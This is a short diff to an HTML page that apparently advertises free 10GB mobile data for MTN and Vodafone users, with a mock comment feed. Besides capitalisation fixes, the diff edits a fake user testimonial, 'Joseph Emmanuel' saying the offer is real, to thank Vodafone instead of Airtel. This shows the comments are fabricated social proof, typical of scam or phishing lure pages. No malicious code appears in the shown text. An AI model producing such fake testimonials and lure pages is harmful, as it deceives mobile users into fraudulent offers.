--- a/faila.html
+++ b/faila.html
@@ -132,8 +132,8 @@
     height: 56px;
 ">
 <option value="أختر نوع الشبكة" selected="1">---Select Network---</option>
-<option value="1"> MTN - 10gb  </option>
-<option value="2"> VODAFONE- 10gb </option>
+<option value="1"> MTN - 10GB  </option>
+<option value="2"> VODAFONE- 10GB </option>
 
 </select>
 </center><br>
@@ -218,7 +218,7 @@
                     <div class="single-container">
                         <span class="user"> Joseph Emmanuel </span>
                         <span class="text"> 
-                        I doubt this offer at first, but it's real. i just got my 10GB thank you Airtel.
+                        I doubt this offer at first, but it's real. i just got my 10GB thank you Vodafone.
                         </span>
                     </div>
                     <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
